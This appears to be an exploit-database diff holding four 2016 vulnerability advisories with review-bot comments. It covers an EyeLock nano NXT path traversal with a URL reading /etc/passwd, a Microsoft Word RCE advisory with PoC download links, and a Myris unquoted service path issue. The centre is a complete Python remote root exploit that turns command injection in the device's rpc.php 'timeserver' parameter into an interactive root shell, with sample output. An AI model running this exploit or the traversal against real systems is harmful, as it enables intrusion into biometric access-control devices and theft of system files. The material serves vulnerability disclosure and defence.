NXT Firmware: 3.01.646 (ICM: 3.1.13)
|
||||
|
||||
Platform: Hardware (Biometric Iris Reader (master))
|
||||
|
||||
Summary: Nano NXT is the most advanced compact iris-based identity authentication device
|
||||
in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
|
||||
Nano NXT is a miniaturized iris-based recognition system capable of providing
|
||||
real-time identification, both in-motion and at a distance. The Nano NXT is an
|
||||
ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
|
||||
secured entrances, server rooms and any other physical space. Similarly the device
|
||||
is powerful and compact enough to secure high-value transactions, critical databases,
|
||||
network workstations or any other information system.
|
||||
|
||||
Desc: nano NXT suffers from a file disclosure vulnerability when input passed thru the
|
||||
'path' parameter to 'logdownload.php' script is not properly verified before being used
|
||||
to read files. This can be exploited to disclose contents of files from local resources.
|
||||
|
||||
==================================================================================
|
||||
/scripts/logdownload.php:
|
||||
-------------------------
|
||||
1: <?php
|
||||
2: header("Content-Type: application/octet-stream");
|
||||
3: header("Content-Disposition: attachment; filename={$_GET['dlfilename']}");
|
||||
4: readfile($_GET['path']);
|
||||
5: ?>
|
||||
==================================================================================
|
||||
|
||||
Tested on: GNU/Linux (armv7l)
|
||||
lighttpd/1.4.35
|
||||
SQLite/3.8.7.2
|
||||
PHP/5.6.6
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5356
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php
|
||||
|
||||
|
||||
10.06.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
|
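Review bot: the PoC URL uses a `../../../../../../../../etc/passwd` traversal sequence, but the quoted `readfile($_GET['path'])` on line 4 prepends no base directory, so a plain absolute path (`path=/etc/passwd`) would do; the advisory should say the traversal is unnecessary rather than implying the script is rooted in some directory. Two things the text leaves undocumented: whether `/scripts/logdownload.php` is reachable without authentication (the companion rpc.php advisory says "unauthenticated", this one does not say either way), and that `$_GET['dlfilename']` on line 3 is also copied into the `Content-Disposition` header without any check, so the attacker controls the served filename as well. There is also no vendor response or fixed-firmware line, only the four affected builds and a date.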
179
platforms/php/webapps/40228.py
Executable file
|
@ -0,0 +1,179 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
#
|
||||
# EyeLock nano NXT 3.5 Remote Root Exploit
|
||||
#
|
||||
#
|
||||
# Vendor: EyeLock, LLC
|
||||
# Product web page: http://www.eyelock.com
|
||||
# Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
|
||||
# NXT Firmware: 3.04.1108 (ICM: 3.4.13)
|
||||
# NXT Firmware: 3.03.944 (ICM: 3.3.2)
|
||||
# NXT Firmware: 3.01.646 (ICM: 3.1.13)
|
||||
#
|
||||
# Platform: Hardware (Biometric Iris Reader (master))
|
||||
#
|
||||
# EyeLock is an advanced iris authentication and recognition solutions company
|
||||
# focused on developing next-generation systems for global access control and identity
|
||||
# management.
|
||||
#
|
||||
# Summary: nano NXT® - the next generation of EyeLock’s revolutionary access
|
||||
# control solutions. nano NXT renders all other access control peripherals
|
||||
# obsolete by revolutionizing how identities are protected, authenticated,
|
||||
# and managed. With a sleek low profile and powerful capabilities, the nano
|
||||
# NXT redefines the future of access control. An optional SDK is available
|
||||
# to customers who want to customize their security solutions to integrate
|
||||
# seamlessly with existing applications. The nano NXT authenticates up to 20
|
||||
# people per minute, in-motion and at-a-distance with unparalleled accuracy.
|
||||
# nano NXT can be used in a variety of environments including commercial/enterprise,
|
||||
# corrections, data centers, education, financial services, government, healthcare
|
||||
# facilities and hospitality.
|
||||
#
|
||||
# Nano NXT is the most advanced compact iris-based identity authentication device
|
||||
# in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
|
||||
# Nano NXT is a miniaturized iris-based recognition system capable of providing
|
||||
# real-time identification, both in-motion and at a distance. The Nano NXT is an
|
||||
# ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
|
||||
# secured entrances, server rooms and any other physical space. Similarly the device
|
||||
# is powerful and compact enough to secure high-value transactions, critical databases,
|
||||
# network workstations or any other information system.
|
||||
#
|
||||
# Desc: EyeLock's nano NXT firmware latest version 3.5 (released 25.07.2016) suffers
|
||||
# from multiple unauthenticated command injection vulnerabilities. The issue lies
|
||||
# within the 'rpc.php' script located in the '/scripts' directory and can be triggered
|
||||
# when user supplied input is not correctly sanitized while updating the local time for
|
||||
# the device and/or get info from remote time server. The vulnerable script has two REQUEST
|
||||
# parameters 'timeserver' and 'localtime' that are called within a shell_exec() function
|
||||
# for setting the local time and the hardware clock of the device. An attacker can exploit
# these conditions gaining full system (root) access and execute OS commands on the affected
# device by injecting special characters to the affected parameters and further bypass
# the access control in place.
#
# Hint: Plenty other RCE bugs are present in the rpc.php and others (like: uploadCertificate.php,
# upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.)
#
# =============================================================================
# /scripts/rpc.php:
# -----------------
# 9: if (isset($_REQUEST['action']))
# 10: {
# 11: switch($_REQUEST['action'])
# ...
# ...
# 181: case 'updatetime':
# 182: {
# 183: // do something, the put our response in the response field...
# 184: $strDate = shell_exec("rdate -s {$_REQUEST['timeserver']} 2>&1");
# 185:
# 186: // set the hardware clock.
# 187: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 188:
# 189: $strtheDate = shell_exec("date 2>&1");
# 190:
# 191: echo "updatetime|{$strDate}|{$strtheDate}";
# 192:
# 193: break;
# 194: }
# 195:
# 196: case 'updatelocaltime':
# 197: {
# 198: // do something, the put our response in the response field...
# 199: $strDate = shell_exec("date -s '{$_REQUEST['localtime']}' 2>&1");
# 200:
# 201: // set the hardware clock
# 202: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 203:
# 204: $strtheDate = shell_exec("date 2>&1");
# 205:
# 206: echo "updatelocaltime|{$strDate}|{$strtheDate}";
# 207:
# 208: break;
# 209: }
# =============================================================================
#
# -----------------------------------------------------------------------------
# Master: 192.168.40.1
# Slave: 192.168.40.2
#
# $ eyelock.py 192.168.40.1
#
# root@192.168.40.1:~# id
# uid=0(root) gid=0(root)
#
# root@192.168.40.1:~# cat /home/root/knockd.conf
# [options]
# logfile = /var/log/knockd.log
#
# [openSSH]
# sequence = 1973,1975,2013
# seq_timeout = 15
# command = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
# [closeSSH]
# sequence = 91,85,70
# seq_timeout = 5
# command = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
#
# root@192.168.40.1:~# exit
#
# $
# -----------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux (armv7l)
# lighttpd/1.4.35
# SQLite/3.8.7.2
# PHP/5.6.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5357
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php
#
#
# 10.06.2016
#

import re,sys,os
import requests

piton = os.path.basename(sys.argv[0])

print '''
---------------------------------------------------------
EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit

Zero Science Lab - http://zeroscience.mk
ZSL-2016-5357

---------------------------------------------------------
'''

if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ipaddress>\n'
    sys.exit()

ipaddr = sys.argv[1]

print
while True:
    try:
        cmd = raw_input('root@'+ipaddr+':~# ')
        # http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26
        execute = requests.get('http://'+ipaddr+'/scripts/rpc.php?action=updatetime&timeserver=||'+cmd)
        pattern = re.compile(r'updatetime\|(.*?)\|',re.S|re.M)
        cmdout = pattern.match(execute.text)
        print cmdout.groups()[0].strip()
        print
        if cmd.strip() == 'exit':
            break
    except Exception:
        break

sys.exit()
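Review bot: The header claims the attacker can "further bypass the access control in place", but the rpc.php excerpt quoted at lines 9-11 dispatches straight on `$_REQUEST['action']` with no authentication check in view, so it is unclear whether an upstream check is being bypassed or the endpoint is simply unauthenticated; one sentence on that would help readers judge the fix, which has to be both an auth check in front of rpc.php and `escapeshellarg()` on the `timeserver` and `localtime` values that the `shell_exec()` sinks at lines 184 and 199 interpolate verbatim. Also, the comment above the `requests.get` call documents the `updatelocaltime`/`localtime` variant while the request actually sent uses `action=updatetime` with `timeserver`, so the comment and the code should agree, and the `print` statements and `raw_input` make this a Python 2 script, which the header should state.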
59
platforms/windows/dos/40224.txt
Executable file
@ -0,0 +1,59 @@
#####################################################################################

# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#######################################################################################

===================
1) Introduction
===================

Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3] under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985), Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite. Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.

(https://en.wikipedia.org/wiki/Microsoft_Word)

#######################################################################################

===================
2) Report Timeline
===================

2016-05-15: Sébastien Morin of COSIG report the vulnerability to MSRC.
2016-06-07: MSRC confirm the vulnerability
2016-08-09: Microsoft fixed the issue (MS16-099).
2016-08-09: Advisory released.

#######################################################################################

===================
3) Technical details
===================

This vulnerability allow remote code execution if a user opens a specially crafted Microsoft Office Word (.doc) with an invalid WordDocumentStream.
An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.

#######################################################################################

==========
4) POC
==========

https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40224.zip

#######################################################################################
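Review bot: Section 3 does not support the title's "Out-of-Bounds Read" wording: it only says the .doc carries "an invalid WordDocumentStream" and asserts remote code execution, with no faulting module, no indication of which structure or field is malformed, and no argument for why an out-of-bounds read yields code execution rather than the crash the dos category implies. At minimum the debugger crash summary for the linked sample should be included so defenders can recognise the fault. Minor: the Introduction is pasted from Wikipedia with its footnote markers ([3], [4][5][6]) left in, "Platforms: Windows, OSX" conflicts with the Windows-only platform tag on the file, and "This vulnerability allow" / "MSRC confirm" should read "allows" / "confirmed".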
54
platforms/windows/local/40226.txt
Executable file
@ -0,0 +1,54 @@
EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation


Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: 3.3.21289.1311

Summary: myris® provides unparalleled security, is portable, lightweight
and is as easy as looking in a mirror. Use myris to quickly and easily
enroll users for EyeLock’s access control products or to grant users
access to corporate domain environments within seconds—users never have
to type their username and password again.

Desc: The application suffers from an unquoted search path issue impacting
the service 'MyrisService' for Windows deployed as part of Myris solution.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert their code in the
system root path undetected by the OS or other security applications where
it could potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated privileges
of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5355
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php


10.06.2016

--


C:\Users\joxy>sc qc MyrisService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MyrisService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Myris SDK Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
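Review bot: The `sc qc` output is the entire evidence here, and the telling detail at BINARY_PATH_NAME (a path containing spaces under "Program Files (x86)" and "Eyelock Corporation" with no surrounding quotes, for a service that runs as LocalSystem with AUTO_START) deserves one sentence spelling it out, since the Desc only talks about "the system root path". The advisory also gives no remediation: the installer should register the service with a quoted image path, and until a fixed build ships an administrator can quote it in place with `sc config MyrisService binPath= "\"C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe\""` and confirm with `sc qc MyrisService` that BINARY_PATH_NAME now shows the quotes. Minor: the Summary is vendor marketing copy, and the discovery date (10.06.2016) is given without a vendor-contact or disclosure timeline.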